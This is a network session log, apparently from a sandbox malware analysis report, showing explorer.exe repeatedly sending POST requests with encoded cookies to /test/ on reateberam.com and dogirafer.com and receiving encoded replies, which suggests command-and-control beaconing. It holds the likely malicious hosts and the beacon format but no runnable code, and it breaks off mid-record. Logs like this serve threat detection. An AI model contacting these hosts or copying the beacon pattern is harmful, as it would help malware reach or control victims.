2024-12-02 17:42:33 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:34 UTC	790	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKquydMq08N6T7CVcZMaT0fdbDAWQGHUXe9t8vgcps1lqPdaNdwGqT6yP43efRUZqqdyKindG%2F1ts8WzydJzV0cq5XSHdLjCnnzzZtyeMLvab%2B76gkPq24JYDZYy%2F9g5Qg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d3c2e5d1906-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1626&rtt_var=701&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1795817&cwnd=252&unsent_bytes=0&cid=56bf2339ecd288c4&ts=764&x=0"
2024-12-02 17:42:34 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 79 6d 5a 52 63 53 31 33 6f 70 6c 61 78 33 52 67 47 2f 6c 67 33 35 49 4f 45 72 52 41 79 66 43 61 2f 2b 7a 74 69 48 4b 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 4a 30 49 75 66 35 72 6a 37 46 6b 6a 44 4c 57 33 74 61 64 47 73 4a 71 6d 70 38 41 34 36 45 35 64 47 6d 56 49 36 73 53 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6f 78 42 4f 4c 6d 49 58 4d 57 61 62 66 44 63 33 49 6c 71 34 5a 41 36 56 76 5a 44 78 34 70 67 45 38 31 4d 6c 77 4c 4f 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 52 54 52 70 Data Ascii: 150MymZRcS13oplax3RgG/lg35IOErRAyfCa/+ztiHKZmmcphSGpB6yiJiVjA1nJ0Iuf5rj7FkjDLW3tadGsJqmp8A46E5dGmVI6sSnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcoxBOLmIXMWabfDc3Ilq4ZA6VvZDx4pgE81MlwLO8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfRTRp
2024-12-02 17:42:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50044	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:35 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:36 UTC	790	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lrUnNfxnxYp8MhsIo%2FJg5ZPBjJrNBINZZ53KhKTtPeYAn1vz7BFerLNZZfnXBNBg1mLildnb%2B%2BfRLYsFvTg7pRr3vA1trk1tRlZAMYae6eWqDHPR0QPgqTNN2kuTUSk29w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d48eb120f75-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1488&rtt_var=575&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1875401&cwnd=229&unsent_bytes=0&cid=78d0892f8626b934&ts=723&x=0"
2024-12-02 17:42:36 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 53 6d 62 52 63 75 79 33 49 70 68 59 52 33 65 68 57 2f 6a 67 33 4a 4d 4d 30 50 54 41 79 44 43 62 50 65 79 75 69 48 50 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 4a 45 63 6f 66 4a 44 70 37 46 67 67 41 4c 71 2f 73 71 56 47 73 5a 57 6d 70 38 41 37 35 55 35 51 47 32 64 46 36 4d 4f 67 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 77 41 75 72 67 4a 68 35 2b 61 62 50 47 66 33 49 71 34 73 74 45 37 56 58 59 44 68 35 45 37 45 6f 30 4e 46 4d 4f 50 59 37 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 53 52 4a Data Ascii: 150PSmbRcuy3IphYR3ehW/jg3JMM0PTAyDCbPeyuiHPYmmcphSGpB6yiJiVjA1sJEcofJDp7FggALq/sqVGsZWmp8A75U5QG2dF6MOgfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwwAurgJh5+abPGf3Iq4stE7VXYDh5E7Eo0NFMOPY7MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1SRJ
2024-12-02 17:42:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50045	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:37 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:38 UTC	791	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCQoRGzHR7EqS6eLT6ZkZKWw57DB03DmAV7taFWGvUo8M8Deb5Q87mDVmgbrA%2BjX6yS94w4XTPAL4MZho61ojyqM9ng6SMet54IAGPJ8SSD%2Bqpi8U%2BXh8VuvMhkofDln7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d57aa0136ac-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14210&min_rtt=14189&rtt_var=5336&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=205793&cwnd=32&unsent_bytes=0&cid=385c1ef2c4fb73e0&ts=708&x=0"
2024-12-02 17:42:38 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 79 71 66 54 4d 61 36 32 59 70 6a 61 68 6e 59 68 47 4c 68 67 33 39 4b 50 30 6e 65 42 43 62 43 61 2f 32 78 76 79 58 49 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 42 6f 49 45 4d 6a 63 70 65 4f 67 46 59 6c 43 4c 71 2f 2f 61 63 4c 75 70 61 75 6f 4d 78 52 35 53 68 63 47 6d 4a 45 36 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 42 45 4d 30 32 42 75 37 68 54 68 6b 57 61 4c 54 43 65 33 6c 68 37 34 42 48 36 6c 4c 62 43 58 5a 50 67 6b 30 31 4f 46 34 4b 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 2f 46 52 51 35 Data Ascii: 150OyqfTMa62YpjahnYhGLhg39KP0neBCbCa/2xvyXIKRib7xuPoA21j4bUizBoIEMjcpeOgFYlCLq//acLupauoMxR5ShcGmJE64+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzBEM02Bu7hThkWaLTCe3lh74BH6lLbCXZPgk01OF4KcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/FRQ5
2024-12-02 17:42:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50046	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:40 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:40 UTC	789	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5u91zCZKGSA4vQsy4vif1tAb0nYNmXVYi7NCdqTnn2Cbw2nKl1hQzkcrwG%2FX%2Fvkv5lFkwTaKXZui28GdHgKlHYYXH5DdhjZi4fhsU4UlNFfeL%2Fegtvhq3m6GPFyPZ8Goog%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d675cdf43ed-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1636&rtt_var=818&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4210&recv_bytes=1053&delivery_rate=223840&cwnd=205&unsent_bytes=0&cid=545a17c4ed24c54d&ts=766&x=0"
2024-12-02 17:42:40 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 43 6d 61 52 38 4b 32 32 34 70 68 61 78 58 51 67 47 36 73 79 33 46 4d 4f 30 4c 65 41 6b 36 70 62 2f 71 36 76 79 62 4a 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 5a 76 4a 45 34 69 66 2f 7a 69 67 56 6f 6d 43 62 4b 2f 2f 61 55 4e 73 5a 43 72 6f 63 46 52 36 79 64 58 48 6d 64 4c 37 59 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 46 46 63 73 79 42 2b 7a 69 54 68 67 59 5a 62 48 49 66 58 4e 68 34 49 64 44 37 56 54 64 41 48 5a 46 69 6b 77 34 4e 6c 38 41 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 76 4a 56 52 4a Data Ascii: 150PCmaR8K224phaxXQgG6sy3FMO0LeAk6pb/q6vybJKRib7xuPoA21j4bUizZvJE4if/zigVomCbK//aUNsZCrocFR6ydXHmdL7Y+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzFFcsyB+ziThgYZbHIfXNh4IdD7VTdAHZFikw4Nl8AcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZNvJVRJ
2024-12-02 17:42:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50047	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:42 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:43 UTC	794	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xjQB9pQZ7PVo0vWL6gqzJVzVF02dSm9y%2BkdFb%2BJi17JN5M8XtGlLJqscmWuOxJUk005%2B%2BE3ixWxwDaPGDXF7uufvc8M1N6b2P9KGnyznKJAg%2FqSbfY9goN0gtSfTW5tuCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d74dfb7c457-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1531&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1424390&cwnd=252&unsent_bytes=0&cid=bd7f8e5485c4f7a7&ts=771&x=0"
2024-12-02 17:42:43 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 69 71 59 51 4d 4f 33 32 59 70 75 59 68 6a 66 6a 57 54 70 67 33 4e 4d 4f 45 76 65 44 53 58 43 61 76 75 31 75 43 44 4c 62 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 74 49 55 45 6a 63 70 48 6b 37 46 6f 69 41 4c 47 36 73 4b 64 47 74 4a 47 76 6f 63 67 36 37 30 35 57 48 47 4a 49 35 38 57 6d 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 41 7a 41 75 6a 71 4a 52 78 2b 5a 62 62 49 65 58 41 6b 71 34 39 44 37 46 4c 5a 44 42 38 70 68 45 45 2f 4d 6c 6f 4e 50 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 42 51 51 4a Data Ascii: 150PiqYQMO32YpuYhjfjWTpg3NMOEveDSXCavu1uCDLbGmcphSGpB6yiJiVjA1tIUEjcpHk7FoiALG6sKdGtJGvocg6705WHGJI58WmfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcAzAujqJRx+ZbbIeXAkq49D7FLZDB8phEE/MloNPsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfBQQJ
2024-12-02 17:42:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50048	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:44 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:45 UTC	795	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1NE7Z46lnyZwJ71Jo6z2Irl4SzVCfknFTvWBrVk5LUJDzs%2F8AgBRNBWbJmfz7i4xzZ2lfu%2FctPvkK89zNmElKUFAc%2FAivLG1JheOMWdjC%2B9K%2FkNEXQ9ZvcgYCAnhTEnlKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d822c3d43d4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2674&min_rtt=1600&rtt_var=1367&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=1825000&cwnd=221&unsent_bytes=0&cid=23b53557ccc82f5c&ts=748&x=0"
2024-12-02 17:42:45 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 79 79 61 51 63 4f 37 74 75 42 6e 61 68 58 65 67 32 47 73 7a 48 64 4f 4f 45 72 52 41 30 36 71 62 66 75 31 76 43 54 4a 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 6d 4a 30 34 69 66 35 75 4f 67 46 59 72 43 72 47 37 74 4f 30 43 73 4a 53 6d 6f 38 73 2b 67 69 56 57 47 6d 42 4c 35 73 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 38 30 33 41 75 6a 71 4a 6e 4d 51 62 72 54 48 63 6e 41 75 71 34 56 41 37 6c 54 62 41 52 45 70 67 6b 30 34 4f 46 73 50 4f 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 56 56 51 5a Data Ascii: 150PyyaQcO7tuBnahXeg2GszHdOOErRA06qbfu1vCTJKRib7xuPoA21j4bUizRmJ04if5uOgFYrCrG7tO0CsJSmo8s+giVWGmBL5sHsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4G803AujqJnMQbrTHcnAuq4VA7lTbAREpgk04OFsPO8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfVVQZ
2024-12-02 17:42:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50049	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:47 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50050	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:50 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:51 UTC	786	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BlKiNglA2jX7Vnd7eQA%2FW%2BLTClO2al5ksUWTTXu1sjTAMnjtHIzvcsm1bdb6Djez1APFqnqP%2BOYiPtafscEdh%2FGRER1lHGh0Pg6yTFyIcPxc5JpCTngbVR8iOMyvxKzU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1da62a04ab08-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13825&min_rtt=13774&rtt_var=5202&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=211993&cwnd=32&unsent_bytes=0&cid=22d7e6a83880b105&ts=1616&x=0"
2024-12-02 17:42:51 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4d 69 79 65 51 38 57 32 33 6f 70 75 5a 42 54 5a 68 6d 4f 73 7a 6e 4a 4c 4d 6b 76 54 61 79 4b 6b 61 76 75 33 75 79 2b 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 75 44 4a 71 4a 30 55 75 66 50 7a 6d 67 56 77 67 44 72 53 2f 2f 61 6b 4a 73 35 61 71 70 71 63 35 37 69 52 52 46 47 70 49 6f 2f 36 61 56 44 46 73 64 55 46 50 51 56 48 2b 70 59 43 4f 52 6e 33 45 39 6a 30 66 4a 5a 30 4b 34 71 38 38 32 67 32 36 2b 76 37 62 52 69 45 6d 73 56 58 63 49 79 2f 43 46 38 77 31 42 65 75 4d 4b 52 77 58 61 62 2f 47 66 6a 30 6f 34 49 5a 48 35 6c 44 61 5a 78 46 4f 69 6b 6b 39 4e 46 78 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 72 4f 76 35 52 52 5a Data Ascii: 14cMiyeQ8W23opuZBTZhmOsznJLMkvTayKkavu3uy+AWB/S4BKLswqykcfTuDJqJ0UufPzmgVwgDrS//akJs5aqpqc57iRRFGpIo/6aVDFsdUFPQVH+pYCORn3E9j0fJZ0K4q882g26+v7bRiEmsVXcIy/CF8w1BeuMKRwXab/Gfj0o4IZH5lDaZxFOikk9NFxEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbrOv5RRZ
2024-12-02 17:42:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50051	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:53 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:54 UTC	790	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hgo8DqJ%2BV6yB%2BmJeTCLZ5m6C%2FgIV5SQdK%2FrPKsP%2FCYQxkAqsaXurjque2Vl6KnMZe9OqtIBvnB%2FsOBjG8oEvMcIQ0B7TtbxsfQJnCdAZE%2Bo94ZZf80VFIzmDS5JhHDuc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1db90d8e558a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1578&rtt_var=972&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=941328&cwnd=252&unsent_bytes=0&cid=92b14ac6a71b3d9a&ts=1621&x=0"
2024-12-02 17:42:54 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 69 79 55 52 73 43 36 32 34 70 6e 59 68 6e 5a 6a 57 50 6a 67 33 46 48 4d 6b 7a 55 44 43 44 43 61 76 69 31 76 79 37 4b 62 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6f 4a 55 55 73 66 70 72 6d 37 46 6b 71 43 37 53 37 74 4b 56 47 74 4a 53 72 6f 4d 67 39 67 69 56 58 47 32 74 50 35 73 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 4d 6f 34 41 4f 37 6d 4b 58 4d 56 61 4c 66 47 65 48 46 68 34 34 39 41 37 46 76 65 41 58 5a 44 67 6b 45 35 4e 46 73 4d 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 76 56 55 52 70 Data Ascii: 